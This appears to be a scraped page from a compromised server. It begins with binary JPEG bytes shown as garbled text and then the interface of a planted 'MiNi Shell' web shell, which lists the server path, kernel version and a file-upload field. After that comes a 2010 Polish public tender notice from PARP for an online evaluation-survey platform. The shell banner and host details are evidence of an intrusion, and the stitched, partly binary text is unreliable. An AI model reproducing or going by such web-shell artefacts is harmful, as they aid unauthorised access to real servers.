JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101130/342909-N-2010.html

<p class="kh_header"><b>Warszawa: Wykonanie i wdrożenie platformy Systemu Internetowych Badań Ewaluacyjnych (SIBE) i prowadzenie - w latach 2011-2015 - ewaluacji bieżącej (on-going) wybranych działań POIG skierowanych do 
przedsiębiorców i Instytucji Otoczenia Biznesu</b><br>
<b>Numer ogłoszenia: 342909 - 2010; data zamieszczenia: 30.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Polska Agencja Rozwoju Przedsiębiorczości , Pańska 81/83, 00-834 Warszawa, woj. mazowieckie, tel. (022) 432 80 80, faks (022) 432 86 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.parp.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Agencja działająca na podstawie ustawy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie i wdrożenie platformy Systemu Internetowych Badań Ewaluacyjnych (SIBE) i prowadzenie - w latach 2011-2015 - ewaluacji bieżącej (on-going) wybranych działań POIG skierowanych do 
przedsiębiorców i Instytucji Otoczenia Biznesu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie i wdrożenie platformy Systemu Internetowych Badań Ewaluacyjnych (SIBE) i prowadzenie - w latach 2011-2015 - ewaluacji bieżącej 
(on-going) wybranych działań POIG skierowanych do przedsiębiorców i Instytucji Otoczenia Biznesu, zgodnie z Szczegółowym opisem przedmiotu zamówienia stanowiącym załącznik nr 1 do SIWZ.
2.	Przedmiot zamówienia obejmuje również przeniesienie na Zamawiającego autorskich praw majątkowych w zakresie:
1)	Systemu Internetowych Badań Ewaluacyjnych PARP wraz z powykonawczą dokumentacją techniczną, oraz 
2)	wszelkich opracowań (raporty, prezentacje, opracowania w innej formie), zawierających rezultaty wykonanych prac badawczych, 
na warunkach określonych we wzorze umowy stanowiącym załącznik nr 2 do SIWZ. Wymagana przez Zamawiającego forma, zakres treściowy oraz elementy składowe ww. utworów zostały określone w załączniku nr 1 do SIWZ.
3.	Przedmiot zamówienia według klasyfikacji Wspólnego Słownika Zamówień (CPV): 
Kod CPV: 
72212000-4 - Usługi programowania oprogramowania aplikacyjnego
72240000-9 - Usługi analizy systemu i programowania
79300000-7 - Badania rynkowe i ekonomiczne; ankietowanie i statystyka.
4.	Zamówienie jest współfinansowane ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Pomocy Technicznej Programu Operacyjnego Innowacyjna Gospodarka.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.21.20.00-4, 72.24.00.00-9, 79.30.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości 5 000 złotych (słownie: pięć tysięcy złotych 00/100). Wadium należy wnieść przed upływem terminu składania ofert.
2.	Wadium może być wnoszone w jednej lub w kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275)
3.	Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy nr PL34 1750 0009 0000 0000 0248 3556, w Raiffeisen Bank Polska S.A. ul. Piękna 20 00-549 Warszawa, Centrala w Warszawie z dopiskiem -r/198/WP/2010-. 
4.	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą wpływu środków pieniężnych na rachunek bankowy, o którym mowa w ust. 3, przed upływem terminu składania ofert.
5.	Wadium wnoszone w formach określonych w ust. 2 pkt 2-5, musi zawierać zobowiązanie gwaranta lub poręczyciela z tytułu wystąpienia zdarzeń, o których mowa w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych, przy czym: 
1)	w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokumenty te muszą obejmować swym zakresem wszelkie roszczenia Zamawiającego z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań każdego z nich,
2)	dokumenty te będą zawierały klauzule zapłaty sumy wadialnej na rzecz zamawiającego bezwarunkowo i na pierwsze żądanie,
3)	dokumenty te zostaną złożone w oryginale. 
6.	Oryginały dokumentów, o których mowa w ust. 2 pkt 2-5), należy złożyć należy złożyć wraz z ofertą, w osobnej kopercie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez Wykonawcę warunku udziału w postępowaniu dokonana będzie metodą spełnia - nie spełnia na podstawie informacji przedstawionych w dokumentach załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie - wykonali/wykonują należycie, co najmniej 4 różne usługi:
i.	jedna usługa o wartości nie mniejszej niż 100 000 zł brutto każda (a w przypadku, jeżeli wartość usługi została w umowie wyrażona w walucie obcej - wyrażona 
w złotych równowartość kwoty co najmniej 100 000 złotych brutto wg średniego kursu NBP z dnia zawarcia umowy o świadczenie usług), których przedmiotem było m.in. prowadzenie ilościowych badań cyklicznych (ciągłych) o charakterze trackingowym (ang. tracking study), zakładających nie rzadszą niż półroczną częstotliwość raportowania wyników oraz łączną próbę ze wszystkich fal danego badania nie mniejszą niż 1500 obserwacji;
ii.	dwie usługi o wartości nie mniejszej niż 15 000 zł brutto każda (a w przypadku, jeżeli wartość usługi została w umowie wyrażona w walucie obcej - wyrażona w złotych równowartość kwoty co najmniej 15 000 złotych brutto wg średniego kursu NBP z dnia zawarcia umowy o świadczenie usług), których przedmiotem było m.in. prowadzenie badań ilościowych z wykorzystaniem techniki CAWI (ang. Computer Assisted Web Interviewing) na próbie co najmniej 1000 przedsiębiorstw;
iii.	jedną usługę, której przedmiotem było wykonanie i wdrożenie aplikacji webowej wspierającej proces badań internetowych typu CAWI, skierowanych do ściśle określonej grupy docelowej tj. enumeratywnej listy respondentów wskazanej przez klienta/zamawiającego.
Ocena spełniania przez Wykonawcę warunku udziału w postępowaniu dokonana będzie metodą spełnia - nie spełnia na podstawie informacji przedstawionych w dokumentach załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez Wykonawcę warunku udziału w postępowaniu dokonana będzie metodą spełnia - nie spełnia na podstawie informacji przedstawionych w dokumentach załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy dysponują co najmniej 6 osobami które pełnić będą następujące funkcje:
a) kierownik projektu, który:
-	posiada wyższe wykształcenie oraz tytuł zawodowy - co najmniej inżyniera lub licencjata lub magistra, oraz:
-	w ciągu 3 lat przed upływem terminu składnia ofert, kierował co najmniej 4 projektami badawczymi lub ewaluacyjnymi lub analityczno-eksperckimi, 
przy czym przedmiotem co najmniej jednego z nich było m.in. prowadzenie ilościowych badań cyklicznych (ciągłych) o charakterze trackingowym (ang. tracking study), zakładających nie rzadszą niż półroczną częstotliwość raportowania wyników oraz łączną próbę ze wszystkich fal danego badania nie mniejszą niż 1500 obserwacji; Wartość każdego z projektów wynosiła co najmniej 100 000 zł brutto (a w przypadku, jeżeli wartość projektu została w umowie wyrażona w walucie obcej - wyrażona w złotych równowartość kwoty co najmniej 100 000 złotych brutto wg średniego kursu NBP z dnia zawarcia umowy o świadczenie usług). 

b) trzech ekspertów informatyków-programistów, spośród których:
-	co najmniej dwóch w ciągu 3 lat przed upływem terminu składnia ofert, zrealizowało co najmniej po 3 projekty (tzn. dwóch ekspertów zrealizowało łącznie 6 projektów) dotyczące wykonania i wdrożenia aplikacji webowej, wspomagającej proces gromadzenia danych z wykorzystaniem formularza(y) on-line połączonego(-ych) z relacyjną bazą danych (np. ankiety internetowe, generatory wniosków o dofinansowanie, itp.); Wartość każdego z projektów wynosiła co najmniej 20 000zł brutto (a w przypadku, jeżeli wartość projektu została w umowie wyrażona w walucie obcej - wyrażona w złotych równowartość kwoty co najmniej 20 000 złotych brutto wg średniego kursu NBP z dnia zawarcia umowy o świadczenie usług) oraz;
-	co najmniej dwóch w ciągu 3 lat przed upływem terminu składnia ofert, realizowało co najmniej po 1 projekcie (tzn. dwóch ekspertów zrealizowało łącznie 2 projekty) dotyczącym wykonania i wdrożenia aplikacji webowej wspierającej proces badań internetowych typu CAWI, skierowanych do ściśle określonej grupy docelowej tj. enumeratywnej listy respondentów wskazanej przez klienta/zamawiającego; Wartość każdego z projektów wynosiła co najmniej 20 000 zł brutto (a w przypadku, jeżeli wartość projektu została w umowie wyrażona w walucie obcej - wyrażona w złotych równowartość kwoty co najmniej 20 000 złotych brutto wg średniego kursu NBP z dnia zawarcia umowy o świadczenie usług); Projekty mogą powtarzać się z projektami wymaganymi w poprzednim punkcie; oraz 
-	co najmniej dwóch w ciągu 3 lat przed upływem terminu składania ofert realizowało minimum 2 projekty (tzn. dwóch ekspertów zrealizowało łącznie 4 projekty), dotyczące wykonania i wdrożenia aplikacji webowej, zawierającej autoryzowany (tj. zapewniający bezpieczne logowanie) panel użytkowników (np. respondentów w badaniu internetowym, partnerów w sieci sprzedaży, klientów, członków społeczności internetowej itp.) oraz współpracujący z nim panel zarządzania treścią typu CMS (ang. Content Management System), przeznaczony dla personelu nietechnicznego (tzw. help desku), umożliwiający kompleksową obsługę (np. respondentów, partnerów, klientów, członków społeczności internetowej, itp.) z poziomu prostego interfejsu użytkownika; Wartość każdego z projektów wynosiła co najmniej 20 000 zł brutto (a w przypadku, jeżeli wartość projektu została w umowie wyrażona w walucie obcej - wyrażona w złotych równowartość kwoty co najmniej 20 000 złotych brutto wg średniego kursu NBP z dnia zawarcia umowy o świadczenie usług); Projekty mogą powtarzać się z projektami wymaganymi w poprzednich punktach.
-	co najmniej jeden w ciągu 3 lat przed upływem terminu składania ofert kierował wykonaniem i wdrożeniem - w instytucji publicznej lub przedsiębiorstwie zatrudniającym nie mniej niż 25 pracowników - co najmniej dwóch aplikacji webowych. Wartość każdego z projektów wynosiła co najmniej 20 000 zł brutto (a w przypadku, jeżeli wartość projektu została w umowie wyrażona w walucie obcej - wyrażona w złotych równowartość kwoty co najmniej 20 000 złotych brutto wg średniego kursu NBP z dnia zawarcia umowy o świadczenie usług); Projekty mogą powtarzać się z projektami wymaganymi w poprzednich punktach.

c) trzech ekspertów ds. badań ilościowych, spośród których:
-	każdy posiada wyższe wykształcenie oraz tytuł zawodowy - co najmniej inżyniera lub licencjata lub magistra, oraz;
-	każdy w ciągu 3 lat przed upływem terminu składnia ofert, realizował co najmniej 2 projekty badawcze, w których był odpowiedzialny m.in. za realizację badań techniką CAWI; Wartość każdego z projektów wynosiła co najmniej 
40 000 zł brutto (a w przypadku, jeżeli wartość projektu została w umowie wyrażona w walucie obcej - wyrażona w złotych równowartość kwoty co najmniej 40 000 złotych brutto wg średniego kursu NBP z dnia zawarcia umowy o świadczenie usług) oraz;
-	każdy w ciągu 3 lat przed upływem terminu składnia ofert, realizował co najmniej 2 projekty w których jako analityk był odpowiedzialny za analizę statystyczną i interpretację danych pochodzących z badań ilościowych; Wartość każdego z projektów wynosiła co najmniej 40 000 zł brutto (a w przypadku, jeżeli wartość projektu została w umowie wyrażona w walucie obcej - wyrażona w złotych równowartość kwoty co najmniej 40 000 złotych brutto wg średniego kursu NBP z dnia zawarcia umowy o świadczenie usług); Projekty mogą powtarzać się z projektami wymaganymi w poprzednim punkcie; oraz
-	co najmniej dwóch w ciągu 3 lat przed upływem terminu składnia ofert, realizowało co najmniej 1 projekt, w których byli odpowiedzialni za analizę statystyczną i interpretację danych pochodzących z badań cyklicznych (ciągłych) o charakterze trackingowym; Wartość każdego z projektów wynosiła co najmniej 40 000 zł brutto (a w przypadku, jeżeli wartość projektu została w umowie wyrażona w walucie obcej - wyrażona w złotych równowartość kwoty co najmniej 40 000 złotych brutto wg średniego kursu NBP z dnia zawarcia umowy o świadczenie usług); Projekty mogą powtarzać się z projektami wymaganymi w poprzednich punktach; oraz
-	co najmniej jeden w ciągu 3 lat przed terminem składania ofert był autorem lub współautorem minimum 4 raportów cząstkowych lub prezentacji multimedialnych dotyczących wyników kolejnych fal badania trackingowego; Raporty te mogą dotyczyć badań opisanych w punktach powyżej.

d) eksperta ds. badania innowacyjności gospodarki, który:
-	posiada wyższe wykształcenie oraz tytuł zawodowy magistra, oraz;
-	w ciągu 3 lat przed upływem terminu składnia ofert, brał udział w realizacji co najmniej 3 badań lub analiz dotyczących problematyki działalności innowacyjnej przedsiębiorstw lub działalności proinnowacyjnej Instytucji Otoczenia Biznesu. Wartość każdego z projektów wynosiła co najmniej 100 000 zł brutto (a w przypadku, jeżeli wartość projektu została w umowie wyrażona w walucie obcej - wyrażona w złotych równowartość kwoty co najmniej 100 000 złotych brutto wg średniego kursu NBP z dnia zawarcia umowy o świadczenie usług) oraz; 
-	w ciągu 3 lat przed upływem terminu składania ofert, był autorem lub współautorem co najmniej 2 publikacji (tj. utworów opublikowanych w formie artykułu w czasopiśmie lub w formie książkowej, opisujących oryginalne badania i wynikające z nich wnioski, lub zbierających w formie przeglądu wnioski z wcześniej opublikowanych prac) dotyczących problematyki działalności innowacyjnej przedsiębiorstw lub działalności proinnowacyjnej Instytucji Otoczenia Biznesu; Publikacje mogą dotyczyć badań opisanych w punkcie powyżej.

e) eksperta ds. ewaluacji, który:
-	posiada wyższe wykształcenie oraz tytuł zawodowy magistra, oraz;
-	w ciągu 3 lat przed upływem terminu składnia ofert, brał udział w realizacji co najmniej 3 ewaluacji programów współfinansowanych ze środków Unii Europejskiej (w tym ze środków przedakcesyjnych lub funduszy strukturalnych UE), przy czym co najmniej dwie z tych ewaluacji, powinny dotyczyć problematyki przedsiębiorstw lub Instytucji Otoczenia Biznesu; Wartość każdej ewaluacji wynosiła co najmniej 100 000 zł brutto (a w przypadku, jeżeli wartość ewaluacji została w umowie wyrażona w walucie obcej - wyrażona w złotych równowartość kwoty co najmniej 100 000 złotych brutto wg średniego kursu NBP z dnia zawarcia umowy o świadczenie usług) oraz;
-	jest autorem lub współautorem co najmniej 3 raportów (tj. dokumentów lub opracowań, opisujących rezultaty badań i analiz, przygotowanego dla podmiotu zlecającego ewaluację) z ewaluacji programów współfinansowanych ze środków Unii Europejskiej (w tym środków przedakcesyjnych lub funduszy strukturalnych UE); Raporty te mogą dotyczyć ewaluacji opisanych w punkcie powyżej.

Zamawiający dopuszcza, aby funkcje kierownika projektu, eksperta ds. ewaluacji, eksperta ds. badania innowacyjności gospodarki oraz jednego z ekspertów ds. badań ilościowych- mogła pełnić ta sama osoba, pod warunkiem, że spełni ona łącznie warunki przewidziane dla tych osób (ekspertów)
Ocena spełniania przez Wykonawcę warunku udziału w postępowaniu dokonana będzie metodą spełnia - nie spełnia na podstawie informacji przedstawionych w dokumentach załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy posiadają środki finansowe lub zdolność kredytową w wysokości minimum 100 000 PLN.
Ocena spełniania przez Wykonawcę warunku udziału w postępowaniu dokonana będzie metodą spełnia - nie spełnia na podstawie informacji przedstawionych w dokumentach załączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmiany postanowień umowy w przypadkach określonych poniżej:
1)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia;
2)	konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi realizację projektu, w ramach którego realizowane jest zamówienie;
3)	konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Innowacyjna Gospodarka lub wytycznych i zaleceń Instytucji Zarządzającej PO IG lub Instytucji Pośredniczącej I stopnia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.parp.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Polska Agencja Rozwoju Przedsiębiorczości, ul. Pańska 81/83, 00-834 Warszawa.</p>
